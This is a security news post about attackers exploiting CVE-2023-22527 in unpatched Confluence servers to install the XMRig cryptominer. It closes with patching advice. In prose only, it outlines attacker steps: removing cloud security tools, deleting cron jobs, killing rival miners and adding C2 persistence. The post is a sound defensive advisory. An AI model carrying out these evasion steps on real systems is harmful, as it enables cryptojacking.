Blog Details

  • Home
  • Blog
  • Critical Atlassian Confluence Flaw Exploited for Cryptocurrency Mining
Critical Atlassian Confluence Flaw Exploited for Cryptocurrency Mining

Critical Atlassian Confluence Flaw Exploited for Cryptocurrency Mining

Threat actors are actively exploiting a critical security vulnerability in Atlassian Confluence Data Center and Confluence Server to conduct unauthorized cryptocurrency mining on vulnerable instances. This vulnerability, tracked as CVE-2023-22527, has already been patched, but unpatched systems remain at significant risk.

The Vulnerability: CVE-2023-22527

CVE-2023-22527 is a severe flaw in older versions of Atlassian Confluence Data Center and Confluence Server. It enables unauthenticated attackers to execute remote code, which can lead to complete system compromise. Atlassian addressed this vulnerability in mid-January 2024, urging users to update their software to the latest versions to protect against potential exploitation.

Exploit Activity

Despite the availability of patches, many organizations have not yet applied the necessary updates, leaving their systems open to attacks. Between mid-June and the end of July 2024, Trend Micro researchers observed a surge in exploitation attempts targeting this vulnerability. Attackers used these exploits to deploy the XMRig miner, a popular tool for cryptojacking that mines Monero cryptocurrency by using the victim's computing resources.

Techniques Used by Attackers

At least three different threat actors are believed to be behind the malicious activities exploiting CVE-2023-22527. Their methods include:

  1. Deploying XMRig Miner via ELF Payload: Attackers use specially crafted requests to deliver an ELF file payload, which installs the XMRig miner on unpatched systems.

  2. Using Shell Scripts: In some cases, attackers deploy shell scripts that perform several actions to maximize mining efficiency and evade detection:

    • Terminating Competing Cryptojacking Campaigns: The script kills processes associated with other cryptojacking campaigns, such as Kinsing.
    • Deleting Existing Cron Jobs: The script deletes all current cron jobs to eliminate potential detection and interference.
    • Uninstalling Cloud Security Tools: The script removes cloud security tools, particularly from Alibaba and Tencent, which might detect and block the cryptojacking activities.
    • Gathering System Information: The script collects information about the infected system, which may be used for further exploitation or to optimize mining performance.
    • Setting Up New Cron Jobs: The script creates a new cron job that establishes a connection to the command-and-control (C2) server every five minutes, ensuring persistent access and control over the infected system.

The Risks of Cryptojacking

Cryptojacking, the unauthorized use of computer systems to mine cryptocurrency, can have serious consequences for organizations. It can significantly degrade system performance, increase energy consumption, and lead to higher operational costs. More critically, the presence of cryptojacking software often indicates a security breach, which could expose organizations to other forms of cyber threats, such as data theft or ransomware attacks.

Recommendations

Trend Micro researcher Abdelrahman Esmail emphasized the urgent need for organizations to mitigate the risks associated with CVE-2023-22527 by updating their Atlassian Confluence installations to the latest versions. Regular patching and vulnerability management are essential in defending against exploitation attempts.

To protect against cryptojacking and other cyber threats, organizations should:

  • Apply Security Patches: Regularly update software to fix vulnerabilities as soon as patches become available.
  • Monitor Network Traffic: Use security tools to detect unusual network activity that could indicate cryptojacking.
  • Use Anti-Malware Solutions: Implement comprehensive anti-malware solutions that can detect and block cryptojacking software.
  • Educate Employees: Conduct cybersecurity awareness training to inform employees about potential threats and safe practices.

 

The exploitation of CVE-2023-22527 highlights the ongoing risks associated with unpatched software vulnerabilities. By staying vigilant and proactive in applying security updates, organizations can significantly reduce their exposure to cryptojacking and other cyber threats.

© 2016 - 2025 Red Secure Tech Ltd. Registered in England and Wales under Company Number: 15581067